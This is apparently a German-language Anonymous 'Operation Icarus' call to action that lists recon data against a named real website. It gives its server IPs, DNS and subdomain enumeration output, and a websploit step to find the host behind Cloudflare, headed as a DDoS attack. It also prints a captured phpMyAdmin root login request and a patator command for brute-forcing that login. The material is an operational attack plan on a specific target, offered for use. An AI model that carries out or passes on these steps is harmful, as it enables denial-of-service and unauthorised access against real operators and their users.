Anonymous [Deutsch] Operation Icarus | Runde 2 | 2016

image_pdfimage_print

Wir sind Anonymous.
Wir stehen vereint gegen die gierigen Banker.

► Informationen, Fortschritte und Updates:
https://www.facebook.com/events/96415…

► Gruppe:
https://www.facebook.com/groups/11142…

► Million Mask March Deutschland:
https://www.facebook.com/events/17399…

► Daten für diese Operation:
http://pastebin.com/K0aMQC6N

► Erste Nachricht:
https://www.youtube.com/watch?v=7Yqwb…


✶ Anonymous Deutschland LEGION Facebook:
https://goo.gl/EJk4KQ

✶ Anonymous Deutschland LEGION YouTube:
https://goo.gl/77qhUc

✶ Million Mask March Deutschland:
https://goo.gl/gZKi0R


 

Daten zur Operation Icarus:

» AnonHQ is NOT Anonymous! «

 

OpShutDownAnonHQ‬

http://anonhq.com/

IP address 104.20.42.159 (Cloudflare)

IPv6 address 2400:cb00:2048:1:0:0:6814:2a9f

CloudFlare, Inc. 101 Townsend Street San Francisco CA US 94107 104.20.43.159 Linux cloudflare-nginx 15-Apr-2016

CloudFlare, Inc. 101 Townsend Street San Francisco CA US 94107 104.20.42.159 Linux cloudflare-nginx 14-Apr-2016

http://mail.anonhq.com/

http://anonhq.com/xmlrpc.php

Nameserver cass.ns.cloudflare.com

DNS admin dns@cloudflare.com

Reverse DNS mail.anonhq.com

Nameserver organisation whois.cloudflare.com

Domain registrar godaddy.com

anonhq.com ip is 104.20.42.159
mail.anonhq.com ip is 149.202.58.162
www.anonhq.com ip is 104.20.42.159

https://104.20.42.159:8443/
https://104.20.42.159:443/

ip4 149.202.58.162

a mail.anonhq.com

Enter target domain: anonhq

— Testing common subdomains for misconfiguration —
[x] direct.anonhq is hosted at 31.199.53.10
[x] forum.anonhq is hosted at 31.199.53.10
[x] mail.anonhq is hosted at 31.199.53.10
[x] portal.anonhq is hosted at 31.199.53.10
[x] imap.anonhq is hosted at 31.199.53.10
[x] direct-connect.anonhq is hosted at 31.199.53.10
[x] beta.anonhq is hosted at 31.199.53.10
[x] webmail.anonhq is hosted at 31.199.53.10
[x] pop.anonhq is hosted at 31.199.53.10
[x] cpanel.anonhq is hosted at 31.199.53.10
[x] ftp.anonhq is hosted at 31.199.53.10
[x] admin.anonhq is hosted at 31.199.53.10

— Testing common tlds —
[x] anonhq.com is hosted at 104.20.42.159
[x] anonhq.com is hosted at 104.20.43.159
[x] anonhq.com is hosted at 2400:cb00:2048:1::6814:2b9f
[x] anonhq.com is hosted at 2400:cb00:2048:1::6814:2a9f
[x] anonhq.net is hosted at 98.124.243.49
[x] anonhq.info is hosted at 31.199.53.10
[x] anonhq.org is hosted at 50.63.202.45
[x] anonhq.biz is hosted at 31.199.53.10
[x] anonhq.cc is hosted at 31.199.53.10
[x] anonhq.ru is hosted at 31.199.53.10
[x] anonhq.co.uk is hosted at 31.199.53.10
[x] anonhq.us is hosted at 31.199.53.10
[x] anonhq.su is hosted at 31.199.53.10

CloudFlare IP Ranges

Some applications or host providers might find it handy to know about CloudFlare’s IPs.
This page is intended to be the definitive source of CloudFlare’s current IP ranges. IPv4

IPv4

103.21.244.0/22
103.22.200.0/22
103.31.4.0/22
104.16.0.0/12
108.162.192.0/18
131.0.72.0/22
141.101.64.0/18
162.158.0.0/15
172.64.0.0/13
173.245.48.0/20
188.114.96.0/20
190.93.240.0/20
197.234.240.0/22
198.41.128.0/17
199.27.128.0/21
Also available as a IPv4 text list.

IPv6

2400:cb00::/32
2405:8100::/32
2405:b500::/32
2606:4700::/32
2803:f800::/32
Also available as a IPv6 text list.

DDOS ATTACK CLOUDFARE

websploit

show modules

use web/cloudfare_resolver

show options

set TARGET 149.202.58.162

run

nslookup www.anonhq.com

check subdomains

nslookup ftp.anonhq.com
nslookup mail.anonhq.com

https://149.202.58.162/mail/

http://anonhq.com/

┌─[root@parrot]─[~/Desktop]
└──╼ ‪#‎dnsmap‬
dnsmap 0.30 – DNS Network Mapper by pagvac (gnucitizen.org)

usage: dnsmap <target-domain> [options]
options:
-w <wordlist-file>
-r <regular-results-file>
-c <csv-results-file>
-d <delay-millisecs>
-i <ips-to-ignore> (useful if you’re obtaining false positives)

e.g.:
dnsmap target-domain.foo
dnsmap target-domain.foo -w yourwordlist.txt -r /tmp/domainbf_results.txt
dnsmap target-fomain.foo -r /tmp/ -d 3000
dnsmap target-fomain.foo -r ./domainbf_results.txt

┌─[✗]─[root@parrot]─[~/Desktop]
└──╼ #dnsmap anonhq.com
dnsmap 0.30 – DNS Network Mapper by pagvac (gnucitizen.org)

[+] searching (sub)domains for anonhq.com using built-in wordlist
[+] using maximum random delay of 10 millisecond(s) between requests

mail.anonhq.com
IP address #1: 149.202.58.162

www.anonhq.com
IPv6 address #1: 2400:cb00:2048:1::6814:2b9f
IPv6 address #2: 2400:cb00:2048:1::6814:2a9f

www.anonhq.com
IP address #1: 104.20.42.159
IP address #2: 104.20.43.159

[+] 3 (sub)domains and 5 IP address(es) found
[+] completion time: 262 second(s)
┌─[root@parrot]─[~/Desktop]
└──╼ #

http://www.w3db.xyz/search/anonhq.com

http://webstatvalue.com/anonhq.com

http://www.capefeargatorclub.com/anonhq.com

Domain Nameserver Information

Host IP Address Country
cass.ns.cloudflare.com 173.245.58.81 United States United States
hal.ns.cloudflare.com 173.245.59.174 United States United States

DNS Record Analysis

Host Type TTL Extra
anonhq.com A 300 IP: 104.20.43.159
anonhq.com A 300 IP: 104.20.42.159
anonhq.com NS 86400 Target: hal.ns.cloudflare.com
anonhq.com NS 86400 Target: cass.ns.cloudflare.com
anonhq.com SOA 86400 MNAME: cass.ns.cloudflare.com
RNAME: dns.cloudflare.com

anonhq.com MX 300 Priority: 10

Target: mail.anonhq.com
anonhq.com TXT 300 TXT: v=spf1 a mx ip4:149.202.58.162

a:mail.anonhq.com ~all

anonhq.com AAAA 300 IPV6: 2400:cb00:2048:1::6814:2a9f

anonhq.com AAAA 300 IPV6: 2400:cb00:2048:1::6814:2b9f

http://149.202.58.162/phpmyadmin/index.php

POST /phpmyadmin/index.php HTTP/1.1Host: 149.202.58.162User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1Accept: text/html,application/xhtml

+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://149.202.58.162/phpmyadmin/index.phpCookie: pma_lang=en;

pma_collation_connection=utf8_unicode_ci; phpMyAdmin=gv7h76p03der2id40bme52i7u1q1vbo4Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length:

101pma_username=root&pma_password=admin&server=1&target=index.php&token=d1f7c1b6a6d747dd3d1de50f161de94e

URL: http://149.202.58.162/phpmyadmin/

patator http_fuzz url=http://149.202.58.162/phpmyadmin/index.php method=POST body=’pma_username=root&pma_password=FILE0&server=1&lang=en‘ 0=/root/Desktop/wordslist/predator.txt follow=1 accept_cookie=1 -x ignore:fgrep=’Cannot log in to the MySQL server‘

image_pdfimage_print